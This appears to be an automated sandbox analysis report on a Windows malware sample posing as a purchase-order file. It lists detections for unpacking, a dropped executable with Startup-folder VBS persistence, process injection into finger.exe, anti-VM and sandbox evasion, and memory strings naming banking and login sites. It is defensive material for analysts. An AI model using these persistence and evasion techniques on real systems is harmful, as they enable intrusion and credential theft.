                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360028021.0000000000A3F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: P.Order request for quotations.exe, NodeTransformer.cs.Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: HashSize.exe.0.dr, NodeTransformer.cs.Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: 0.2.P.Order request for quotations.exe.3cf3fd0.1.raw.unpack, NodeTransformer.cs.Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 7.2.HashSize.exe.38a0a04.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P.Order request for quotations.exe.5f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.HashSize.exe.38a0a04.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P.Order request for quotations.exe.5f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.HashSize.exe.383bfb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.HashSize.exe.39a01f0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.HashSize.exe.39a01f0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1048159785.0000000005F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1316719764.000000000383B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P.Order request for quotations.exe PID: 7152, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HashSize.exe PID: 660, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004014F0 push FFFFFF89h; retn D8D9h2_2_00401A97
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004014F0 push ebx; retn F2A0h2_2_00401B60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0042D963 push edi; iretd 2_2_0042D96C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00407109 push cs; iretd 2_2_0040710B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_004149E2 push edi; retf 2_2_004149E3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00406365 push ebx; ret 2_2_00406366
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00403370 push eax; ret 2_2_00403372
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00417E8E push ebx; iretd 2_2_00417E90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_00414F55 push 00000079h; retf 2_2_00414F57
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0040D75B push ss; ret 2_2_0040D760
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0041870B pushad ; retf 2_2_0041870C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0041AF95 push esi; iretd 2_2_0041AF97
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017709AD push ecx; mov dword ptr [esp], ecx2_2_017709B6
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F9692 push ebx; retf 4_2_063F969B
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063E96D7 push ebx; ret 4_2_063E96D8
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063ED73D push es; ret 4_2_063ED73F
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063FBF91 push edx; iretd 4_2_063FBF94
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063EA47B push cs; iretd 4_2_063EA47D
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_06410CD5 push edi; iretd 4_2_06410CDE
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F9A32 push ds; iretd 4_2_063F9A33
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063FB200 push ebx; iretd 4_2_063FB202
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F82C7 push 00000079h; retf 4_2_063F82C9
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063FE307 push esi; iretd 4_2_063FE309
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4_2_063F4055 push esp; retf 4_2_063F409E
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E809AD push ecx; mov dword ptr [esp], ecx5_2_02E809B6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0033A5F0 push edi; iretd 5_2_0033A5F9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0032C766 push cs; retf 5_2_0032C77D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00324B1B push ebx; iretd 5_2_00324B1D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00312FF2 push ebx; ret 5_2_00312FF3
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00325398 pushad ; retf 5_2_00325399
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031D970 push esp; retf 5_2_0031D9B9
                      Source: 0.2.P.Order request for quotations.exe.57c0000.2.raw.unpack, mgq64nVMGL0un50mCUJ.csHigh entropy of concatenated method names: 'amUVWFOrNo', 'E1MVknNPxV', 'wyWVb8M6I5', 'dYGVcHZsJF', 'PmNVS1xdLI', 'anxVDNy0t7', 'IvyVavNer0', 'oF4VU8pdT1', 'bCGVNeVVxw', 'gUaVH82BU7'
                      Source: 0.2.P.Order request for quotations.exe.57c0000.2.raw.unpack, Ms5MWmBBt40ObvbqMvw.csHigh entropy of concatenated method names: 'el4Bn1yFEf', 'H6RBXMA7Ah', 'U3YBMsCsdU', 'o9QByONpcS', 'PicBWOQxal', 'OVeBKsT6ro', 'KG4rD5mIGtd2gP0GRPh', 'VqorUamZASxgAYQU6cH'
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile created: C:\Users\user\AppData\Roaming\HashSize.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: P.Order request for quotations.exe PID: 7152, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HashSize.exe PID: 660, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D324
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D7E4
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D944
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D504
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D544
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762D1E4
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B7630154
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF9B762DA44
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: 45E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B096E rdtsc 2_2_017B096E
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeWindow / User API: threadDelayed 981Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeWindow / User API: threadDelayed 8991Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.8 %
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224Thread sleep time: -80000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224Thread sleep time: -51000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224Thread sleep count: 41 > 30Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224Thread sleep time: -41000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664Thread sleep count: 981 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664Thread sleep time: -1962000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664Thread sleep count: 8991 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664Thread sleep time: -17982000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0032CB70 FindFirstFileW,FindNextFileW,FindClose,5_2_0032CB70
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116964
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: discord.comVMware20,11696494690f
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,1169649
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: HashSize.exe, 00000007.00000002.1277414394.00000000008B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696494690j
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: finger.exe, 00000005.00000002.3365187715.000000000779E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
                      Source: 4ub-1K1Qxn.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
